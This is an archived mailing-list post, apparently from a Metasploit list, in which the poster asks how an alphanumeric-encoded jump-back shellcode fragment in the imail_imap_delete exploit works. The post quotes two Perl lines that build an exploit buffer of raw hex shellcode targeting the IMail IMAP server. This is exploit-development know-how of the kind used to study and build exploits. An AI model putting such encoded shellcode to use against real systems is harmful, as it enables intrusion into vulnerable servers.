imail_imap_delete exploit explanation

[ramatkal at hotmail.com (sol seclists)]

quick question about the imail_imap_delete exploit....

im trying to do a JMP -600 bytes encoded with alphanum characters and i think spoonm did something very similar in the 
imail_imap_delete exploit....

the code in question is presented below:

# get eip code
  $evil .=
    "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59".
    "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59";
  # alphanum encoded jmp back (edx context)
  $evil =
    "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41".
    "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
    "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57".
    "\x70\x55\x50\x4b\x4f\x6b\x52\x6a";


im just wandering if anybody knows how this was done and how this works?

Thanks very much,
RaMatkal
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20050527/dbf09966/attachment.htm>